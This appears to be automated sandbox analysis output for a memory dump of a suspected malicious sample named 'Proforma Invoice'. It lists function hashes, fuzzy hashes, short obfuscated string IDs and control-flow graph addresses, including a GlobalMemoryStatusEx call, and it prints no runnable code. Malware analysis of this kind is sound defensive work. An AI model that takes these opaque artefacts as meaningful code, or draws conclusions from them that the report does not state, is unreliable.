                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q
                                                                                                  • API String ID: 0-831282457
                                                                                                  • Opcode ID: 16625dc69a42c95423e0c6e78bafaa3764aab428b0cf084468a83dd61a47e904
                                                                                                  • Instruction ID: 8ecb2e9f77f059fc1c53700c6f420a40af123abd7f28d4df9ab926628c657258
                                                                                                  • Opcode Fuzzy Hash: 16625dc69a42c95423e0c6e78bafaa3764aab428b0cf084468a83dd61a47e904
                                                                                                  • Instruction Fuzzy Hash: CA624030A002168FCB55EF68D690A5EB7B2FF84304F208979D4469F369DB75ED86CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1187 6c24b70-6c24b94 1188 6c24b96-6c24b99 1187->1188 1189 6c24bba-6c24bbd 1188->1189 1190 6c24b9b-6c24bb5 1188->1190 1191 6c24bc3-6c24cbb 1189->1191 1192 6c2529c-6c2529e 1189->1192 1190->1189 1210 6c24cc1-6c24d09 1191->1210 1211 6c24d3e-6c24d45 1191->1211 1194 6c252a0 1192->1194 1195 6c252a5-6c252a8 1192->1195 1194->1195 1195->1188 1196 6c252ae-6c252bb 1195->1196 1233 6c24d0e call 6c25418 1210->1233 1234 6c24d0e call 6c25428 1210->1234 1212 6c24d4b-6c24dbb 1211->1212 1213 6c24dc9-6c24dd2 1211->1213 1230 6c24dc6 1212->1230 1231 6c24dbd 1212->1231 1213->1196 1224 6c24d14-6c24d30 1227 6c24d32 1224->1227 1228 6c24d3b-6c24d3c 1224->1228 1227->1228 1228->1211 1230->1213 1231->1230 1233->1224 1234->1224
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fcq$XPcq$\Ocq
                                                                                                  • API String ID: 0-3575482020
                                                                                                  • Opcode ID: 5729cf6bd8b3054aa94e0c371066df6001ffdef1e88a06fee26b02b550980d7a
                                                                                                  • Instruction ID: d012552a77afc70322cd8419ae81dbfe5021e2a775388f7bc30ce4ee13c023de
                                                                                                  • Opcode Fuzzy Hash: 5729cf6bd8b3054aa94e0c371066df6001ffdef1e88a06fee26b02b550980d7a
                                                                                                  • Instruction Fuzzy Hash: DA61A170F102199FEB589FA9C8547AEBBF6FB88700F20842AD505AB391DF758D428F51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2134 6c29151-6c29185 2136 6c29187-6c2918a 2134->2136 2137 6c29190-6c291a5 2136->2137 2138 6c29a48-6c29a4b 2136->2138 2144 6c291a7-6c291ad 2137->2144 2145 6c291bd-6c291d3 2137->2145 2139 6c29a71-6c29a73 2138->2139 2140 6c29a4d-6c29a6c 2138->2140 2141 6c29a75 2139->2141 2142 6c29a7a-6c29a7d 2139->2142 2140->2139 2141->2142 2142->2136 2147 6c29a83-6c29a8d 2142->2147 2148 6c291b1-6c291b3 2144->2148 2149 6c291af 2144->2149 2152 6c291de-6c291e0 2145->2152 2148->2145 2149->2145 2153 6c291e2-6c291e8 2152->2153 2154 6c291f8-6c29269 2152->2154 2155 6c291ea 2153->2155 2156 6c291ec-6c291ee 2153->2156 2165 6c29295-6c292b1 2154->2165 2166 6c2926b-6c2928e 2154->2166 2155->2154 2156->2154 2171 6c292b3-6c292d6 2165->2171 2172 6c292dd-6c292f8 2165->2172 2166->2165 2171->2172 2177 6c29323-6c2933e 2172->2177 2178 6c292fa-6c2931c 2172->2178 2183 6c29363-6c29371 2177->2183 2184 6c29340-6c2935c 2177->2184 2178->2177 2185 6c29373-6c2937c 2183->2185 2186 6c29381-6c293fb 2183->2186 2184->2183 2185->2147 2192 6c29448-6c2945d 2186->2192 2193 6c293fd-6c2941b 2186->2193 2192->2138 2197 6c29437-6c29446 2193->2197 2198 6c2941d-6c2942c 2193->2198 2197->2192 2197->2193 2198->2197
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q
                                                                                                  • API String ID: 0-355816377
                                                                                                  • Opcode ID: aecb681b88423ea336d428d941a3c097a9b7684afe93ee868e78bd2931463e2d
                                                                                                  • Instruction ID: e46f0b99d56e9acc8f65ad7aa9c6fc1054b13c98c421c9dba356afade5f3a23e
                                                                                                  • Opcode Fuzzy Hash: aecb681b88423ea336d428d941a3c097a9b7684afe93ee868e78bd2931463e2d
                                                                                                  • Instruction Fuzzy Hash: 3C516330B002169FEB54DF76D990B6F73F6EBCA644F108469C909EB344EA35DC428B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2239 6c24b60-6c24b94 2241 6c24b96-6c24b99 2239->2241 2242 6c24bba-6c24bbd 2241->2242 2243 6c24b9b-6c24bb5 2241->2243 2244 6c24bc3-6c24cbb 2242->2244 2245 6c2529c-6c2529e 2242->2245 2243->2242 2263 6c24cc1-6c24d09 2244->2263 2264 6c24d3e-6c24d45 2244->2264 2247 6c252a0 2245->2247 2248 6c252a5-6c252a8 2245->2248 2247->2248 2248->2241 2249 6c252ae-6c252bb 2248->2249 2286 6c24d0e call 6c25418 2263->2286 2287 6c24d0e call 6c25428 2263->2287 2265 6c24d4b-6c24dbb 2264->2265 2266 6c24dc9-6c24dd2 2264->2266 2283 6c24dc6 2265->2283 2284 6c24dbd 2265->2284 2266->2249 2277 6c24d14-6c24d30 2280 6c24d32 2277->2280 2281 6c24d3b-6c24d3c 2277->2281 2280->2281 2281->2264 2283->2266 2284->2283 2286->2277 2287->2277
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fcq$XPcq
                                                                                                  • API String ID: 0-936005338
                                                                                                  • Opcode ID: 2567d6bc449256d097947010d214ca6cc897c3826accf8cb73b8809dbb4a64d9
                                                                                                  • Instruction ID: 287098338d97c8fc6c074a39a421e0cae45c81d71b5904b90cc0ab52920eaf26
                                                                                                  • Opcode Fuzzy Hash: 2567d6bc449256d097947010d214ca6cc897c3826accf8cb73b8809dbb4a64d9
                                                                                                  • Instruction Fuzzy Hash: 66518070F102199FDB589FB9C8547AEBAF7FF88700F20852AD505AB395DB758C028B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2536 13ceb48-13ceb53 2537 13ceb7d-13ceb93 2536->2537 2538 13ceb55-13ceb7c 2536->2538 2557 13ceb95 call 13ceb48 2537->2557 2558 13ceb95 call 13cebd8 2537->2558 2559 13ceb95 call 13ceb39 2537->2559 2541 13ceb9a-13ceb9c 2542 13ceb9e-13ceba1 2541->2542 2543 13ceba2-13cec01 2541->2543 2549 13cec07-13cec94 GlobalMemoryStatusEx 2543->2549 2550 13cec03-13cec06 2543->2550 2553 13cec9d-13cecc5 2549->2553 2554 13cec96-13cec9c 2549->2554 2554->2553 2557->2541 2558->2541 2559->2541
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4091087852.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_13c0000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7f019d52819aaf486249c2880ae488be3f4040668b6650e04af72fb63de1801c
                                                                                                  • Instruction ID: 7d43b0c7057e440bf5da960484be64a046f97e7be53524e637dfdf3b8353b4fe
                                                                                                  • Opcode Fuzzy Hash: 7f019d52819aaf486249c2880ae488be3f4040668b6650e04af72fb63de1801c
                                                                                                  • Instruction Fuzzy Hash: 5B412272E0435A8FDB04DFB9D8042EEBFF1AF89210F14866AD908A3351DB749845CBD1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PH^q
                                                                                                  • API String ID: 0-2549759414
                                                                                                  • Opcode ID: 6629477b8447c2c8e229a5b51cd2ff35ace1494070f0ac917b3cab47e5e7f293
                                                                                                  • Instruction ID: d76582d083ac7c3fd20cee4ffe9d27807d90e94d3d8887b07215af8d91b8c06c
                                                                                                  • Opcode Fuzzy Hash: 6629477b8447c2c8e229a5b51cd2ff35ace1494070f0ac917b3cab47e5e7f293
                                                                                                  • Instruction Fuzzy Hash: 95419D70E0031A9FDB64DFA5C59469EBBB2FF85300F20452DE806E7240DB75EA86CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PH^q
                                                                                                  • API String ID: 0-2549759414
                                                                                                  • Opcode ID: a7f284bffe3edf077ca673a5bfe442112ca5fc281cf6b8aaa2b408f3d96fffd9
                                                                                                  • Instruction ID: 365e77c577e475d95e7b29163460a803893cfca57864e299deeb943f568f9652
                                                                                                  • Opcode Fuzzy Hash: a7f284bffe3edf077ca673a5bfe442112ca5fc281cf6b8aaa2b408f3d96fffd9
                                                                                                  • Instruction Fuzzy Hash: 8641AE70E0031A9FCB65DF65C59469EBBB2FF95300F10452EE806EB240EB74E946CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PH^q
                                                                                                  • API String ID: 0-2549759414
                                                                                                  • Opcode ID: 1d5362ba9cf4bf9274166ac41b05d8ab8db48836da584e0c2b275c5582fa91e4
                                                                                                  • Instruction ID: 85ab68fd9d75dfecb64ca306e32fe945dc29e39f442e748f0dc7996cd18f0cfb
                                                                                                  • Opcode Fuzzy Hash: 1d5362ba9cf4bf9274166ac41b05d8ab8db48836da584e0c2b275c5582fa91e4
                                                                                                  • Instruction Fuzzy Hash: 84310170B002128FCB599F74C95866E7BE2BB89214F20443DD806DB395DF3ADE46CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PH^q
                                                                                                  • API String ID: 0-2549759414
                                                                                                  • Opcode ID: 8b30448c186af6eaa1f94958b7131232ab113b6e8c118e2a2b60c811c2945902
                                                                                                  • Instruction ID: 4213af77ad44b8a93c10e9dbfc26670152141a23d60e24f5cc03884173575c4e
                                                                                                  • Opcode Fuzzy Hash: 8b30448c186af6eaa1f94958b7131232ab113b6e8c118e2a2b60c811c2945902
                                                                                                  • Instruction Fuzzy Hash: B031F270B002168FDB599B74C51866E7BE3BB89210F20843CD806DB394DF3ADE45CBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1e0376ec23b3b45150efbc9310523bf97ca2d4db6be8cd59c6ade6bbc6611193
                                                                                                  • Instruction ID: f56cb90a6f0980f76974ef500e9eaab05b35afbd750f0ac29e732bd97d9913ae
                                                                                                  • Opcode Fuzzy Hash: 1e0376ec23b3b45150efbc9310523bf97ca2d4db6be8cd59c6ade6bbc6611193
                                                                                                  • Instruction Fuzzy Hash: 54D1C134B002169FDB94DF69D980AAEB7B2FB88714F108539D805EB351DB39EC42CB91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8ed0d180f7f0b4aedf04586438f6af56775a20f435dd434a5fdcbf5c5c6ecdeb
                                                                                                  • Instruction ID: 1d54d9d3149d7e264162977a36f1b1b79fe128b6457f56743002c5d7a951aceb
                                                                                                  • Opcode Fuzzy Hash: 8ed0d180f7f0b4aedf04586438f6af56775a20f435dd434a5fdcbf5c5c6ecdeb
                                                                                                  • Instruction Fuzzy Hash: EFA1B870F1021A8FEF648A6CC59476EB7B6FB85304F208839D809EB395CA35DD818791
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ace707bcc1ee4d66ba2200dc27dfe65807183adb87baf3effa84ddd2b000316a
                                                                                                  • Instruction ID: 6353d177b6563b39fa5392a853ec73e3d110e6c033e6d4e251fd61dbae20e79b
                                                                                                  • Opcode Fuzzy Hash: ace707bcc1ee4d66ba2200dc27dfe65807183adb87baf3effa84ddd2b000316a
                                                                                                  • Instruction Fuzzy Hash: 9061D2B1F000224FCF549A7EC89866FBAD7AFC4624B15443AD80EDB364DEA5DD0287D2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 76b65073e732848897e8c7b66b4c485a8d3e0fdfe6d84e6658486a725c394018
                                                                                                  • Instruction ID: b7cd4e7b2aa939f91a89c2718f9d84c4046203ea51f29dd30dd01d4391578006
                                                                                                  • Opcode Fuzzy Hash: 76b65073e732848897e8c7b66b4c485a8d3e0fdfe6d84e6658486a725c394018
                                                                                                  • Instruction Fuzzy Hash: 47816D30B102168FDF58DFA9C55075EB7F2AB89304F108539D80AEB394EB35ED428B51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8300002e4452f92e996294700ce4fe5e8185f20edcd12518dcf808f6502ee083
                                                                                                  • Instruction ID: 09d5e17acfe4362f5e4fab255728493b3723d5fe3f6c77d41d397404d035c334
                                                                                                  • Opcode Fuzzy Hash: 8300002e4452f92e996294700ce4fe5e8185f20edcd12518dcf808f6502ee083
                                                                                                  • Instruction Fuzzy Hash: 82814C30B102169FDF58DFA9D55465EB7F2AB89304F108439D80AEB394EB35ED428B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9613902bd801444b68b4b1cba1f92ada4142fd64eee5ca2dfa7d6a58e47dfb66
                                                                                                  • Instruction ID: 47d45f8973c07807f3c52d551e9bc156bb6105508995e46fce3acb016e746ce4
                                                                                                  • Opcode Fuzzy Hash: 9613902bd801444b68b4b1cba1f92ada4142fd64eee5ca2dfa7d6a58e47dfb66
                                                                                                  • Instruction Fuzzy Hash: D3913B30E1021A8BDB64DF68C880B9DB7B1FF89304F20C699D549EB355DB70AA85CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0f53479e31dcc54212c3ba7fb514573651a75f7e60f30282c472876bc0e889a6
                                                                                                  • Instruction ID: 1057c2d8dcfaebcc44c8a93c4ba7c4056d36f16fe984ec551a11232f8424e6d5
                                                                                                  • Opcode Fuzzy Hash: 0f53479e31dcc54212c3ba7fb514573651a75f7e60f30282c472876bc0e889a6
                                                                                                  • Instruction Fuzzy Hash: 84912B30E1021A8BDB64DF68C880B9DB7B1FF89304F20C599D559EB255DB70AA85CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: de199b93690369f4373ffe8ec056970ee2a83055846362520325e2000e7d3c88
                                                                                                  • Instruction ID: 4fcf8f6e88170c6683860de31411e89d475b829c0de4a53fcb46a9f0b4da23fe
                                                                                                  • Opcode Fuzzy Hash: de199b93690369f4373ffe8ec056970ee2a83055846362520325e2000e7d3c88
                                                                                                  • Instruction Fuzzy Hash: 69712970A0021A9FDB58DFA9D980A9EBBF6FF88304F248429D415EB355DB30ED46CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8de55dd5292bba705a46a97839cf5f848d789ae5a80164a48195d5aaea90878b
                                                                                                  • Instruction ID: ea83fe32e6bec93f175dedf138abfff388d7456fa506259b8567717b31a51ce4
                                                                                                  • Opcode Fuzzy Hash: 8de55dd5292bba705a46a97839cf5f848d789ae5a80164a48195d5aaea90878b
                                                                                                  • Instruction Fuzzy Hash: D8713B70A0021A9FDB54DFA9D980A9EBBF6FF88304F248429D815EB355DB30ED46CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ae541f3af4e43b1a91657d66956107b92b9f2a51482aa5b4724eaab1c49338d4
                                                                                                  • Instruction ID: 6adb6c69b3df6a9820aa34d4ecf45cedbf061ab98deadfb369eb6b4d9c1b5a7e
                                                                                                  • Opcode Fuzzy Hash: ae541f3af4e43b1a91657d66956107b92b9f2a51482aa5b4724eaab1c49338d4
                                                                                                  • Instruction Fuzzy Hash: 0F51E031E0021ACFDB24AF78E4546ADB7B2EB88315F10887DE826E7351DB359D45CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b4c39f7bed5c35c8ab87ef9dba968ae43ef4347d1d6b8294a6b3c39d6089419a
                                                                                                  • Instruction ID: b57cbbec1904726113ff45f7fadacefc8aabcd52a6fcf037cedb4dbe811ba62f
                                                                                                  • Opcode Fuzzy Hash: b4c39f7bed5c35c8ab87ef9dba968ae43ef4347d1d6b8294a6b3c39d6089419a
                                                                                                  • Instruction Fuzzy Hash: 6F51E970B502199FEF646A7CD9A473F266AD789700F20483EE81AE3394C97DCD5543A2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c5352728ffc02eebcb66368489e1aba6ff8b22ed34f89043c873386f5e977d7b
                                                                                                  • Instruction ID: d3e94124ed901052b7a74159dd6bc0a9bebbb7e8669f305e2adbdb45e3fd3ada
                                                                                                  • Opcode Fuzzy Hash: c5352728ffc02eebcb66368489e1aba6ff8b22ed34f89043c873386f5e977d7b
                                                                                                  • Instruction Fuzzy Hash: AB51C670B502199FEF646A7CD9A473F266ED789710F20483EE81AE3394C97DCD8543A2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e02bfc8b0a2fee2c6ceb5333717cee651826df0d18ed8ac4712bd57c384491d1
                                                                                                  • Instruction ID: 7f4a0a4644c7f06401e5393a59c19526895378d245f767c7ed547c99252ee778
                                                                                                  • Opcode Fuzzy Hash: e02bfc8b0a2fee2c6ceb5333717cee651826df0d18ed8ac4712bd57c384491d1
                                                                                                  • Instruction Fuzzy Hash: AA415C71E0061A9FDF70CFA9D880AAFFBB2FB84310F50492AE656D7654D330E9558B90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9dd744c576d8395c941a2278105d86090b14852e314fe80cc47e80ac05ab00f2
                                                                                                  • Instruction ID: 88709233b7b6ea64c480d8836db3170f6cb13432b6d594fcc8d85eb31d67e3da
                                                                                                  • Opcode Fuzzy Hash: 9dd744c576d8395c941a2278105d86090b14852e314fe80cc47e80ac05ab00f2
                                                                                                  • Instruction Fuzzy Hash: 20317271E1031A8FCF15EF69C980A9EB7B1FF95304F104929E806AB355EB70E9468B51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 61de4a4801eb97198e6fbf2b8c909da5a5154a14d900d1ffa2d7854ee72aa4c8
                                                                                                  • Instruction ID: 6eb1764cf95264b14250f4b4600e6c1a87664f4fab31f342bc1f5024a58eaefc
                                                                                                  • Opcode Fuzzy Hash: 61de4a4801eb97198e6fbf2b8c909da5a5154a14d900d1ffa2d7854ee72aa4c8
                                                                                                  • Instruction Fuzzy Hash: AF315E34E102169BCB19CF65D895A9EB7B2FF89300F108529E805EB350DB75EE82CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0b2489be74393e6a703d56938a1c7969230fbab0b93bc7e3841b0a8ad9423d98
                                                                                                  • Instruction ID: d05f607e51c81f77b30672ef8f6445b2b142acfab3d6cf608e0c640a174b26af
                                                                                                  • Opcode Fuzzy Hash: 0b2489be74393e6a703d56938a1c7969230fbab0b93bc7e3841b0a8ad9423d98
                                                                                                  • Instruction Fuzzy Hash: 56315E34E102169BCB59CF65D894A9EB7B2FF89300F108529E806E7350DB75EE82CB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.4103833165.0000000006C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_6c20000_Proforma Invoice.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 42960a5b04634170f774b74976adee1eaa944b6232c464d172111ee9b4ab5e33
                                                                                                  • Instruction ID: c47c074ad718b378d44f3b578b94fd9678a51383e519d6410f5dfced4b453cb8
                                                                                                  • Opcode Fuzzy Hash: 42960a5b04634170f774b74976adee1eaa944b6232c464d172111ee9b4ab5e33
